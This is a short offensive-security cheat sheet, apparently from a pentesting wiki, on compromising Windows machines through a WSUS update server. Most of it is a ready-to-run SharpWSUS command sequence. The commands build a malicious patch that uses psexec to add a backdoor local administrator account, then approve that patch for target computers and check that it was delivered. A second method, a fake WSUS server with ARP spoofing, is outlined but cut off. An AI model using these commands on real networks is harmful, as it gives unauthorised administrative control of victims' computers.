Windows Server Update Services (WSUS)
1) Locate the WSUS server
./SharpWSUS locate2) Find a way to compromise it
3) Enumerate the contents of the WSUS server to determine which machines to target
./SharpWSUS.exe inspect4) Create a malicious patch with a Microsoft signed binary (mandatory)
./SharpWSUS.exe create /payload:"C:\tmp\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user user1 Password123! /add && net localgroup administrators user1 /add\"" /title:"EvilWSUS"5) Create a WSUS group, add the target machine to the WSUS group and approve the malicious patch for deployment
./SharpWSUS.exe approve /updateid:<GUID_from_create> /computername:<target> /groupname:"Evil Group"6) Wait for the client to download the patch, not possible to control
./SharpWSUS.exe check /updateid:<GUID_from_create> /computername:<target>7) Clean up after the patch is downloaded.
1) Find the WSUS server with the REG key
2) Setup the fake WSUS server
3) And ARP spoofing with bettercap and a wsus_spoofing.cap like this:
Last updated